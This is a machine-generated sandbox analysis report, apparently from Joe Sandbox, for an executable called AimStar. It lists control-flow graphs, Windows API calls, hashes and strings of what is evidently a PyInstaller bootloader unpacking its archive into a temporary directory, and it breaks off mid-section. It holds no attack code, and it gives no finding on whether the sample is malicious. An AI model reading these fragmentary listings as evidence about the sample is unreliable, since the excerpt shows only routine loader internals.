process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
                                                                                                                                                                                                                                          • API String ID: 2776309574-3273434969
                                                                                                                                                                                                                                          • Opcode ID: 44b6149e1a44f815cbaf6e2375de99b2dfa5e961a20aa3e5c6a8e77e9d9f5974
                                                                                                                                                                                                                                          • Instruction ID: 1e33ddf3d0fd1846122f8d9e62ab027726d783c4b9834e4b14cc62656726858f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 44b6149e1a44f815cbaf6e2375de99b2dfa5e961a20aa3e5c6a8e77e9d9f5974
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C327C31E0CE8691EA15BB2194567B9A6A9EF44760FC48032DE5D833D6EF2CF55DC320

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 536 7ff710f669d4-7ff710f66a47 call 7ff710f66708 539 7ff710f66a49-7ff710f66a52 call 7ff710f54f58 536->539 540 7ff710f66a61-7ff710f66a6b call 7ff710f58590 536->540 545 7ff710f66a55-7ff710f66a5c call 7ff710f54f78 539->545 546 7ff710f66a6d-7ff710f66a84 call 7ff710f54f58 call 7ff710f54f78 540->546 547 7ff710f66a86-7ff710f66aef CreateFileW 540->547 560 7ff710f66da2-7ff710f66dc2 545->560 546->545 550 7ff710f66b6c-7ff710f66b77 GetFileType 547->550 551 7ff710f66af1-7ff710f66af7 547->551 555 7ff710f66bca-7ff710f66bd1 550->555 556 7ff710f66b79-7ff710f66bb4 GetLastError call 7ff710f54eec CloseHandle 550->556 552 7ff710f66b39-7ff710f66b67 GetLastError call 7ff710f54eec 551->552 553 7ff710f66af9-7ff710f66afd 551->553 552->545 553->552 558 7ff710f66aff-7ff710f66b37 CreateFileW 553->558 563 7ff710f66bd9-7ff710f66bdc 555->563 564 7ff710f66bd3-7ff710f66bd7 555->564 556->545 571 7ff710f66bba-7ff710f66bc5 call 7ff710f54f78 556->571 558->550 558->552 568 7ff710f66be2-7ff710f66c37 call 7ff710f584a8 563->568 569 7ff710f66bde 563->569 564->568 574 7ff710f66c39-7ff710f66c45 call 7ff710f66910 568->574 575 7ff710f66c56-7ff710f66c87 call 7ff710f66488 568->575 569->568 571->545 574->575 581 7ff710f66c47 574->581 582 7ff710f66c8d-7ff710f66ccf 575->582 583 7ff710f66c89-7ff710f66c8b 575->583 584 7ff710f66c49-7ff710f66c51 call 7ff710f5ab30 581->584 585 7ff710f66cf1-7ff710f66cfc 582->585 586 7ff710f66cd1-7ff710f66cd5 582->586 583->584 584->560 588 7ff710f66da0 585->588 589 7ff710f66d02-7ff710f66d06 585->589 586->585 587 7ff710f66cd7-7ff710f66cec 586->587 587->585 588->560 589->588 591 7ff710f66d0c-7ff710f66d51 CloseHandle CreateFileW 589->591 593 7ff710f66d53-7ff710f66d81 GetLastError call 7ff710f54eec call 7ff710f586d0 591->593 594 7ff710f66d86-7ff710f66d9b 591->594 593->594 594->588
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1617910340-0
                                                                                                                                                                                                                                          • Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                                                                                                                                                          • Instruction ID: 3d6b423a49bdf77829fa1d38af55f55ce240d54d2c4597cbe03b68c8a6d3d3b4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 37C1E336B28E4185EB10DFA5C4922AC7779F749BA8F414225DE2E973D4CF38E059C310

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FindFirstFileW.KERNELBASE(?,00007FF710F48B09,00007FF710F43FA5), ref: 00007FF710F4841B
                                                                                                                                                                                                                                          • RemoveDirectoryW.KERNEL32(?,00007FF710F48B09,00007FF710F43FA5), ref: 00007FF710F4849E
                                                                                                                                                                                                                                          • DeleteFileW.KERNELBASE(?,00007FF710F48B09,00007FF710F43FA5), ref: 00007FF710F484BD
                                                                                                                                                                                                                                          • FindNextFileW.KERNELBASE(?,00007FF710F48B09,00007FF710F43FA5), ref: 00007FF710F484CB
                                                                                                                                                                                                                                          • FindClose.KERNEL32(?,00007FF710F48B09,00007FF710F43FA5), ref: 00007FF710F484DC
                                                                                                                                                                                                                                          • RemoveDirectoryW.KERNELBASE(?,00007FF710F48B09,00007FF710F43FA5), ref: 00007FF710F484E5
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                                          • String ID: %s\*
                                                                                                                                                                                                                                          • API String ID: 1057558799-766152087
                                                                                                                                                                                                                                          • Opcode ID: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
                                                                                                                                                                                                                                          • Instruction ID: c8804d72b37f4fb3828078c608a66fd4d2ac8d57e5ae98e05546d570fe33ce39
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28415C31A0CD4795EA60FB24E4569BDA368EB95764FC00232DA9D82794DF2CF54EC720
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2295610775-0
                                                                                                                                                                                                                                          • Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                                                                                                                                                                                                          • Instruction ID: eb04b7a23a504dda5c4cc24377168714489a7164a0105c3d30689595ea8f8b38
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 83F0A432A1CA4586F7A09F60B45AB7AA394AB89338F840335DA6D427D4DF3CF04CCA00

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 329 7ff710f41950-7ff710f4198b call 7ff710f445b0 332 7ff710f41c4e-7ff710f41c72 call 7ff710f4c5c0 329->332 333 7ff710f41991-7ff710f419d1 call 7ff710f47f80 329->333 338 7ff710f419d7-7ff710f419e7 call 7ff710f50744 333->338 339 7ff710f41c3b-7ff710f41c3e call 7ff710f500bc 333->339 344 7ff710f419e9-7ff710f41a03 call 7ff710f54f78 call 7ff710f42910 338->344 345 7ff710f41a08-7ff710f41a24 call 7ff710f5040c 338->345 343 7ff710f41c43-7ff710f41c4b 339->343 343->332 344->339 351 7ff710f41a26-7ff710f41a40 call 7ff710f54f78 call 7ff710f42910 345->351 352 7ff710f41a45-7ff710f41a5a call 7ff710f54f98 345->352 351->339 358 7ff710f41a5c-7ff710f41a76 call 7ff710f54f78 call 7ff710f42910 352->358 359 7ff710f41a7b-7ff710f41afc call 7ff710f41c80 * 2 call 7ff710f50744 352->359 358->339 371 7ff710f41b01-7ff710f41b14 call 7ff710f54fb4 359->371 374 7ff710f41b16-7ff710f41b30 call 7ff710f54f78 call 7ff710f42910 371->374 375 7ff710f41b35-7ff710f41b4e call 7ff710f5040c 371->375 374->339 381 7ff710f41b50-7ff710f41b6a call 7ff710f54f78 call 7ff710f42910 375->381 382 7ff710f41b6f-7ff710f41b8b call 7ff710f50180 375->382 381->339 388 7ff710f41b9e-7ff710f41bac 382->388 389 7ff710f41b8d-7ff710f41b99 call 7ff710f42710 382->389 388->339 392 7ff710f41bb2-7ff710f41bb9 388->392 389->339 395 7ff710f41bc1-7ff710f41bc7 392->395 396 7ff710f41bc9-7ff710f41bd6 395->396 397 7ff710f41be0-7ff710f41bef 395->397 398 7ff710f41bf1-7ff710f41bfa 396->398 397->397 397->398 399 7ff710f41bfc-7ff710f41bff 398->399 400 7ff710f41c0f 398->400 399->400 401 7ff710f41c01-7ff710f41c04 399->401 402 7ff710f41c11-7ff710f41c24 400->402 401->400 405 7ff710f41c06-7ff710f41c09 401->405 403 7ff710f41c2d-7ff710f41c39 402->403 404 7ff710f41c26 402->404 403->339 403->395 404->403 405->400 406 7ff710f41c0b-7ff710f41c0d 405->406 406->402
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F47F80: _fread_nolock.LIBCMT ref: 00007FF710F4802A
                                                                                                                                                                                                                                          • _fread_nolock.LIBCMT ref: 00007FF710F41A1B
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F42910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF710F41B6A), ref: 00007FF710F4295E
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                                          • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                          • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                                          • Opcode ID: 6d43d2f5094c02a69a50d2278f5fdcc42b4033f4591644595bdd37c4696fd258
                                                                                                                                                                                                                                          • Instruction ID: 41efa7b3495124fff8043f3b7efdc5bffd634e46589c353aa36484e706f4381c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6d43d2f5094c02a69a50d2278f5fdcc42b4033f4591644595bdd37c4696fd258
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E816F75B0CE8685E760AB24D442AF9B3A8FB48764F844431EE4D87785DE3CF589C760

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 407 7ff710f41600-7ff710f41611 408 7ff710f41637-7ff710f41651 call 7ff710f445b0 407->408 409 7ff710f41613-7ff710f4161c call 7ff710f41050 407->409 416 7ff710f41682-7ff710f4169c call 7ff710f445b0 408->416 417 7ff710f41653-7ff710f41681 call 7ff710f54f78 call 7ff710f42910 408->417 414 7ff710f4162e-7ff710f41636 409->414 415 7ff710f4161e-7ff710f41629 call 7ff710f42710 409->415 415->414 423 7ff710f416b8-7ff710f416cf call 7ff710f50744 416->423 424 7ff710f4169e-7ff710f416b3 call 7ff710f42710 416->424 432 7ff710f416f9-7ff710f416fd 423->432 433 7ff710f416d1-7ff710f416f4 call 7ff710f54f78 call 7ff710f42910 423->433 431 7ff710f41821-7ff710f41824 call 7ff710f500bc 424->431 439 7ff710f41829-7ff710f4183b 431->439 436 7ff710f41717-7ff710f41737 call 7ff710f54fb4 432->436 437 7ff710f416ff-7ff710f4170b call 7ff710f41210 432->437 448 7ff710f41819-7ff710f4181c call 7ff710f500bc 433->448 445 7ff710f41739-7ff710f4175c call 7ff710f54f78 call 7ff710f42910 436->445 446 7ff710f41761-7ff710f4176c 436->446 444 7ff710f41710-7ff710f41712 437->444 444->448 461 7ff710f4180f-7ff710f41814 445->461 451 7ff710f41802-7ff710f4180a call 7ff710f54fa0 446->451 452 7ff710f41772-7ff710f41777 446->452 448->431 451->461 454 7ff710f41780-7ff710f417a2 call 7ff710f5040c 452->454 462 7ff710f417da-7ff710f417e6 call 7ff710f54f78 454->462 463 7ff710f417a4-7ff710f417bc call 7ff710f50b4c 454->463 461->448 468 7ff710f417ed-7ff710f417f8 call 7ff710f42910 462->468 469 7ff710f417be-7ff710f417c1 463->469 470 7ff710f417c5-7ff710f417d8 call 7ff710f54f78 463->470 474 7ff710f417fd 468->474 469->454 471 7ff710f417c3 469->471 470->468 471->474 474->451
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                                                                                                          • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                                          • API String ID: 2050909247-1550345328
                                                                                                                                                                                                                                          • Opcode ID: bdb202e1f9bc7177cec46868f1cc56065c6c33e9ec8a8b0f81691881613973e0
                                                                                                                                                                                                                                          • Instruction ID: 7816bcef1fa70d460e86ca810e2f4f89878ad3b0ef38055e2c30d485185660e1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bdb202e1f9bc7177cec46868f1cc56065c6c33e9ec8a8b0f81691881613973e0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B1515C75B0CE4692EA10BB21A4029A9A3A8BF447B4FC44531EE0C87796DE3CF589C760

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetTempPathW.KERNEL32(?,?,00000000,00007FF710F43CBB), ref: 00007FF710F488F4
                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,00000000,00007FF710F43CBB), ref: 00007FF710F488FA
                                                                                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(?,00000000,00007FF710F43CBB), ref: 00007FF710F4893C
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F48A20: GetEnvironmentVariableW.KERNEL32(00007FF710F4388E), ref: 00007FF710F48A57
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F48A20: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF710F48A79
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F582A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF710F582C1
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F42810: MessageBoxW.USER32 ref: 00007FF710F428EA
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                          • API String ID: 3563477958-1339014028
                                                                                                                                                                                                                                          • Opcode ID: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
                                                                                                                                                                                                                                          • Instruction ID: 91674fd2d4983c8932960ca1ba99b02b7a0d00544424844afb52f5cdf313c4c3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B0418021B1DE4250EA10BB26A8576BD93A8AF85BA4FC44031ED0D877D6DE3CF54EC320

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 599 7ff710f41210-7ff710f4126d call 7ff710f4bdf0 602 7ff710f41297-7ff710f412af call 7ff710f54fb4 599->602 603 7ff710f4126f-7ff710f41296 call 7ff710f42710 599->603 608 7ff710f412b1-7ff710f412cf call 7ff710f54f78 call 7ff710f42910 602->608 609 7ff710f412d4-7ff710f412e4 call 7ff710f54fb4 602->609 621 7ff710f41439-7ff710f4144e call 7ff710f4bad0 call 7ff710f54fa0 * 2 608->621 615 7ff710f41309-7ff710f4131b 609->615 616 7ff710f412e6-7ff710f41304 call 7ff710f54f78 call 7ff710f42910 609->616 617 7ff710f41320-7ff710f41345 call 7ff710f5040c 615->617 616->621 628 7ff710f4134b-7ff710f41355 call 7ff710f50180 617->628 629 7ff710f41431 617->629 636 7ff710f41453-7ff710f4146d 621->636 628->629 635 7ff710f4135b-7ff710f41367 628->635 629->621 637 7ff710f41370-7ff710f41398 call 7ff710f4a230 635->637 640 7ff710f4139a-7ff710f4139d 637->640 641 7ff710f41416-7ff710f4142c call 7ff710f42710 637->641 643 7ff710f41411 640->643 644 7ff710f4139f-7ff710f413a9 640->644 641->629 643->641 645 7ff710f413ab-7ff710f413b9 call 7ff710f50b4c 644->645 646 7ff710f413d4-7ff710f413d7 644->646 650 7ff710f413be-7ff710f413c1 645->650 648 7ff710f413ea-7ff710f413ef 646->648 649 7ff710f413d9-7ff710f413e7 call 7ff710f69ea0 646->649 648->637 652 7ff710f413f5-7ff710f413f8 648->652 649->648 653 7ff710f413cf-7ff710f413d2 650->653 654 7ff710f413c3-7ff710f413cd call 7ff710f50180 650->654 656 7ff710f413fa-7ff710f413fd 652->656 657 7ff710f4140c-7ff710f4140f 652->657 653->641 654->648 654->653 656->641 659 7ff710f413ff-7ff710f41407 656->659 657->629 659->617
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                                                                                                          • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                          • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                                          • Opcode ID: 4135646233a09d1bafe58e36eb504b74d27aad0b28d423605d6bf35aaf273347
                                                                                                                                                                                                                                          • Instruction ID: c086fc86ed1e5a7eba84767f62f73d64fb4f61f4d74099aff627033b576fcd02
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4135646233a09d1bafe58e36eb504b74d27aad0b28d423605d6bf35aaf273347
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A451CF32B0CE4681EA60BB15A4027BAA299BF857A4FC44131ED4D87B95EF3CF549C320

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,00007FF710F5F11A,?,?,-00000018,00007FF710F5ADC3,?,?,?,00007FF710F5ACBA,?,?,?,00007FF710F55FAE), ref: 00007FF710F5EEFC
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?,?,00007FF710F5F11A,?,?,-00000018,00007FF710F5ADC3,?,?,?,00007FF710F5ACBA,?,?,?,00007FF710F55FAE), ref: 00007FF710F5EF08
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                          • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                          • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                          • Opcode ID: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
                                                                                                                                                                                                                                          • Instruction ID: 3f9b8ab6d8581fe41d81464aef735dad918fc7068acf2bfcec1b14185e2e4dff
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C41E521B2DE0242EA19EF169806675A3A9BF49BB0FC98535ED1D87784DE3CF54DC320

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(?,00007FF710F43804), ref: 00007FF710F436E1
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00007FF710F43804), ref: 00007FF710F436EB
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F42C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF710F43706,?,00007FF710F43804), ref: 00007FF710F42C9E
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F42C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF710F43706,?,00007FF710F43804), ref: 00007FF710F42D63
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F42C50: MessageBoxW.USER32 ref: 00007FF710F42D99
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
